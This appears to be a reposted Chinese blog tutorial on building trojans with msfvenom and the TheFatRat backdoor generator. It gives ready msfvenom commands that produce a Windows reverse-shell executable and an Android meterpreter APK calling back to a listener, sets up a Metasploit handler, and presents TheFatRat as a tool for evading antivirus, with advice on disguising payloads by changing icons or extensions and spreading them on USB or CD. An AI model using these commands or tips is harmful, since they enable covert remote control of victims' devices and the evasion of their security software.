Msfvenom木馬使用及TheFatRat工具


msfvenom –platform windows -p windows/x64/shell/reverse_tcp LHOST=192.168.168.111 LPORT=3333 EXITFUNC=thread -b ‘\x00’ -f exe-only -o /root/Desktop/shell1.exe

msfvenom  -p android/meterpreter/reverse_tcp LHOST=192.168.168.111 LPORT=3333 R>a.apk

 

打開msfconsole

use exploit/multi/handler

set payload windows/meterpreter/reverset_tcp

 

-===========================================

TheFatRat:Msfvenom免殺后門生成工具

項目主頁

https://github.com/screetsec/thefatrat

本工具能使用msfvenom生成后門,程序能夠用meterpreter reverse_tcp payload編譯C語言程序,並能夠繞過殺軟。

自動化metasploit功能

  1. 檢查metasploit服務是否啟動

  2. 建造Windows, Linux, Android 和Mac的meterpreter reverse_tcp payload

  3. 開啟多個meterpreter reverse_tcp監聽

  4. searchsploit快速搜索

  5. 免殺

  6. 進入Msfconsole

自動運行后門

目標如果沒有開啟UAC,你就可以這些文件復制到CD或USB。修改圖標或者后綴

安裝要求

  1. linux操作系統,推薦Kali Linux 2或Kali 2016.1 rolling / Cyborg / Parrot /

    Dracos / BackTrack / Backbox等

  2. metasploit框架

  3. gcc, i586-mingw32msvc-gcc或i686-w64-mingw32-gcc ( apt-get install

    mingw32 )

開始使用

git clone https://github.com/Screetsec/TheFatRat.git

cd TheFatrat

apt-get update

apt-get install mingw32 backdoor-factory

如果提示沒有安裝MinGW或無法找到包

運行

提取lalin-master to your home or another folder

chmod +x fatrat

chmod +x powerfull.sh

./fatrat

然后根據選項輸入相應數字

使用截圖

查毒

文章出處:MottoIN


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM